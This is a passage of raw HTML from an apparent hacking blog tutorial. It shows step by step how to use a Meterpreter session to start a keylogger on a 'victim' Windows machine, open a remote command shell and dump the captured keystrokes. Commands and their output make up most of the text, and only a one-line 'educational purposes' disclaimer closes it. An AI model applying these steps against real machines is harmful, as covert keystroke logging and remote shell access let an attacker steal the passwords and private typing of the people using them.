&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEcpjwXR5OYXomHUqndBnQ90XYeJaUCOpDU2FcJD3Ka4VRHkQIqRJ98Nep6zr5wI2_0jPZ1oP9OyskZHnJ7Z7XqnCAhC-VqImMMMOhycqKb1Tzecun0S_LvlzLZBIC3JK_XS5uA_0EIeq3/s1600/migrating.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584374648682404850&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEcpjwXR5OYXomHUqndBnQ90XYeJaUCOpDU2FcJD3Ka4VRHkQIqRJ98Nep6zr5wI2_0jPZ1oP9OyskZHnJ7Z7XqnCAhC-VqImMMMOhycqKb1Tzecun0S_LvlzLZBIC3JK_XS5uA_0EIeq3/s320/migrating.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 239px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Type in the following:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt; use priv&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now, if you want to start the Keylogger activity on victim, just type keyscan_start&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKv7HCW6eCZSDvX0em8zPnz355IC1MPOY9kzcB_1uciV2GH2qFOoJIiOLMT457NxgjaNsA04OTUpMmDPXeeJCdUlNb3ZdeuNnZ1CkeMsZuBVVHJGFwnwKu4R4aulvd-hepiDtnelhoIbCb/s1600/keylogger+start.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584375810492722786&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKv7HCW6eCZSDvX0em8zPnz355IC1MPOY9kzcB_1uciV2GH2qFOoJIiOLMT457NxgjaNsA04OTUpMmDPXeeJCdUlNb3ZdeuNnZ1CkeMsZuBVVHJGFwnwKu4R4aulvd-hepiDtnelhoIbCb/s320/keylogger+start.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 237px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now, if you want to go to the victim’s computer,&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Jus type shell&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt; shell&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Process 5428 created.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Channel 1 created.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Microsoft Windows [Version 6.1.7600]&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Copyright (c) 2009 Microsoft Corporation. All rights reserved.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;C:\Windows\system32&amp;gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbxmZAo1CLUPsECck3GZwXuKb4sNtfeBDMRKwoBkhw2Fo8tZl4CLSXDRMvE_J7AQPfbGUDQw7DSvsFwFcwy06bNaUFYQoS9wvl5HN8MmZEisDKMUWBIKnAcyOSp3IG3nFurztEmNN1aoJu/s1600/shell.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584376363045204418&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbxmZAo1CLUPsECck3GZwXuKb4sNtfeBDMRKwoBkhw2Fo8tZl4CLSXDRMvE_J7AQPfbGUDQw7DSvsFwFcwy06bNaUFYQoS9wvl5HN8MmZEisDKMUWBIKnAcyOSp3IG3nFurztEmNN1aoJu/s320/shell.JPG&quot; style=&quot;background-color: transparent; border: none; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;You would now be having a command prompt,&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Type in whoami, to see the computer’s name of victim :&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;C:\Windows\system32&amp;gt;whoami&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;whoami&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;win7-pc\win 7&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;C:\Windows\system32&amp;gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMsa0k58lZIxp7SBnOOt5Ot9bvvtXL6QrKlB3_TjVXyJDJBvFYpCyIr1ZOMScxnoMgc2zyPTPERRc84WPgXXoswCswDqxajoig85V-fBMtfyHMdkbbeYR-lxRhHC-GigxYb248XaHW4gP8/s1600/whoami.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584376129407602402&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMsa0k58lZIxp7SBnOOt5Ot9bvvtXL6QrKlB3_TjVXyJDJBvFYpCyIr1ZOMScxnoMgc2zyPTPERRc84WPgXXoswCswDqxajoig85V-fBMtfyHMdkbbeYR-lxRhHC-GigxYb248XaHW4gP8/s320/whoami.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Let’s suppose you want to start a notepad on the victim’s computer.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Type in:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Let’s say the victim has typed in anything on his computer.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Just type exit, to return to meterpreter.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now type in keyscan_dump, to see all the typed keystrokes :&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt; keyscan_dump&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Dumping captured keystrokes...&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKEWzG_jfnv3OEXKyEfRC4kBPjbkAxKE7z4pzeXU-7oKGVckKUPBnJ5535f1KsvQ8yetzSFLo1ZDGL83CAv8VD6xKchhL0Kv4KWOgXRlnrFhWitgQtLL_QUJYsEs5pKdGLGOGIYL-LMjEz/s1600/keyscan_dump2.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584375806112243346&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKEWzG_jfnv3OEXKyEfRC4kBPjbkAxKE7z4pzeXU-7oKGVckKUPBnJ5535f1KsvQ8yetzSFLo1ZDGL83CAv8VD6xKchhL0Kv4KWOgXRlnrFhWitgQtLL_QUJYsEs5pKdGLGOGIYL-LMjEz/s320/keyscan_dump2.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;GaM3 0V3R&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;P.S.: The above information is just for educational purposes only. You should test it against the computer you own.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;About Author : This is a &amp;nbsp;written by Mr. Muhammad Ali. He is a&amp;nbsp; Cyber Security Expert and a security researcher. His main expertise include&amp;nbsp; Privacy Issues online, Web Application Security and Wireless Hacking.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
